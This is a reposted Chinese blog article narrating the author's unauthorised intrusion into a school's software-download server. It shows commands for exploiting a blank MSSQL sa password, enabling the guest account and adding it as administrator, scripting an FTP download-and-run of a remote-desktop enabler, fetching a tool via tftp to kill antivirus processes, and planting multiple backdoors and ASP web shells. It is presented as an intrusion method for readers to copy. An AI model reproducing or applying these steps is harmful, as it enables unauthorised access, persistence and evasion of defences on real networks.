加入收藏 | 设为首页 | 会员中心 | 我要投稿 站长网 (https://www.zhandada.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长学院 > MsSql教程 > 正文

记一次对学校DHCP服务器的入侵渗透过程

发布时间:2022-12-16 14:03:58 所属栏目:MsSql教程 来源:互联网
导读: 前言:
我所处的网络是一个学校内部的校园网, 所有寝室里的电脑全部靠学校一台DHCP服务器自动分配IP地址上网. 不知道为什么最近一段时间,学校的网络不太稳定,而且同学的机器安全越来越好.几

前言:

我所处的网络是一个学校内部的校园网, 所有寝室里的电脑全部靠学校一台DHCP服务器自动分配IP地址上网. 不知道为什么最近一段时间,学校的网络不太稳定,而且同学的机器安全越来越好.几乎很难入侵. 后来知道是学校为学生开设了一个WEB地址,里面有防毒软件下载

出于对技术的追求.对于个各杀毒软件的测试,可以更好的保护我们的后门程序.

我也上去下载了安装玩玩.( 网络卫士).

不安装还好,一装,差点没把我的气死. 除了能够杀出几百年前的那些黑客工具之外. 一些后程序本根发现不了.老报告.你的机器安全.可以放心使用.晕.什么软件啊.

气归气吧.出于本能,突然有种想对这个下载的站进行一次安全性测试,看看能不能入侵.

因为是内网的服务器提供的,软件下载功能.我就没用内鸡.而直接对其入侵分析.

let 's go

一.准备工具:

1. x-scan扫描器.

2. supersqlexec (mssql连接器)

3.2k3389 (开3389)

4.c3389 (改3389)

5. winshell 后门程序

6.wineggdrop 后门程序

7.Remote Administrator 2.1中文版 (永不被杀)

8.tftpd32小型FTP服务器

9. tskill.exe 杀掉系统防毒软件进程

二.收集主机信息.

打开x-scan ,在扫描模块中,选中全部模块,对其进行全面的信息收集.,然后在扫描参数选项卡中,指定IP范围里就填入: 172.16.1.250 就是提供软件下载的服务器IP地址.

一切设置完成后,就点击"扫描"接钮. 不出20分钟,扫描已经完成.查看了一下扫描信息.

**.眼睛一亮.有个SQL弱口令(sa密码为空).我真不敢相信自己的眼睛.这年头这类东西还存在的啊.

不管了.拿出supersqlexec 填入IP,帐号为:SA,密码既然是空,我就不填了. 点击"连接".

突然弹出"连接成功"对话框. 看来真的存在这个漏洞. 那我们还等什么,dir查看一下再说了.

发现系统目录在 c:\winnt\system32.

再用 net start 查看了一下,系统服务.发现里面安装了一些常规服务外,还有个防毒软件(网各卫士) .

再用 net user 查看了一下系统中存在的所有用户.发现除了管理员帐号跟guest 帐号外,还有个 why 帐号. 和TsInternetUser.(TsInternetUser帐号的存在说明这台机器是server) 管它呢. 先加个自己的帐号在里面吧. 但建立新帐号太明显.怕被发现.

我还是看一下guest帐号吧.在它身上做点文章.

net user guest 发现这个帐号没被启用.

那真是太好了.我马上把它击活 net user guest /active:yes

然后加了个密码 net user guest xuesha

接着加为管理员: net localgroup administrators guest /add

既然有了帐号. 还有对方又是server系统,我马上用终端连接器,进行连接.mstsc

输入IP.点击连接.等了近10秒种,发现连接不上" 中断远程桌面"的提示信息.

看来管理员没用开3389端口哦. 那咱办.放弃吗? 这怎么可能.太不像我的作风了. 既然可以用dos命令. 那我为何不用用 ftp 功能啊. 把开3389的端口的工具上传上去.

想到这里,说做就做.马上在 supersqlexec 的提示行中,输入命令,建立一个TXT文件,让服务器自动下载并运行程序.

过程如下:

echo open >up.txt

echo tmwl >>up.txt

echo XXXX >>up.txt

get 2k3389.exe >>up.txt

bye >>up.txt

为了正实,这个文件确实建立成功. 我用type up.txt查看了下. 一切OK.这下就有好戏上场了.

在提示行中输入: ftp -s:up.txt .然后回车.

如果不出意外,几秒钟后,就会提示,文件下载成功.

dir 2k3389.exe /s 查找了一下,果然发现文件已经下载成功了.

我想每个人,做到这一步的时候,心情一样跟我开心.有种说不出的喜乐.

还等什么啊. 运行 2k3389.exe 程序哦. 等服务器重启上来后, 一台3389(内网肉鸡产生了).我等啊等. 10分钟以后,我用mstsc 再次连接. 果然出现登录终端的提示界面.

一阵惊喜,在用户名处输入: guest 刚刚建立的帐号

在密码处输入: xuesha 密码

回车.

一阵不安的等待. 一个模糊的新桌面出现在我的前面.哈哈............各位. 我已经成功进入了

先申明一下. 系统开3389加新建帐号.只是一个后门安制方法. 为了以后我能完全控制这个服务器.接下来,我给它一连开了4个telnet后门.

第二个后门:

这个后门,我当然是把服务器内部自带的 telnet 服务给打开. 好让下次可以在命令提示符下控制.

首先,我们对其 telnet 服务进行配制. 不要把管理员当傻子哦. 这也是为了更好的让后门只为我服务.

1. 运行 tlntadmn.exe 程序.来配制 telnet 服务. 先把 默认的 23 端口改为: 111

再改登录认证 NTLM 值.

设置完毕后,我试着 telnet 172.16.1.250 111, ,成功进入.说明这个后门做成功了.

第三个后门:

这个后门.当然是要首选 winshell 了.

为了更好的把工具上传到服务器上, 我在本地开了一个小型的 tftp服务.(有的是tftpd32)

没想到,刚上传完,就被杀了.5555555555555555555

咱办.不传了吗?NO.

我们把防毒软件的进程,杀掉就行了. 它还防我们个毛啊. 该是我们防它的时候了.

tftp -i 172.16.1.1 get tskill.exe 马上把服务器运行这个命令.

把本机的 tskill.exe 工具上传上去. 杀掉系统防毒软件进程

哈哈.这回它没戏了.

还等什么啊,把winshell服务端上传上去,并运行哦.

第四个后门:

这个后门,我用的是: wineggdrop 后门程序

这个后门程序有个特点,必须把里面自带的一个服务端跟dll文件一起复制到\winnt\system32目录下mssql连接器,才能正常运行的.

希望大家在使用时候,要注意到这点.

有关wineggdrop 后门程序 的服务器配制与 如何在肉鸡上安装,服务端.这里就不介绍了.

具体的使用方法,自己研究吧.

第五个后门:

Remote Administrator 2.1中文版 (永不被杀)

这是个远程控制的. 具体的使用方法,这里不介绍了.

只要你能上传到服务器上,一切好办.

第六个后门;

学校不是开了一个 web 软件下载服务嘛. 那我就放入一个 fso.asp 木马.或者cmd.asp等一些网页的木马.以备不时之需哦.

后门工具的使用方法,我这就不用介绍了.有兴趣朋友自己研究吧. 这里主要是介绍一种入侵的思路.

技术会过时,学习方法,入侵思路不会过时.只要你好好分析别人的入侵思路,结合自己的方法.我想你一定会成为一个入侵高手.

我不是什么黑客,只是对网络安全研究有所兴趣. 更惨的是我这次期未考试.网络工程只得了48分.下学期来得回学校补考.真不知道是中国教育界的悲哀.还是学校在误人子弟.

(编辑:站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!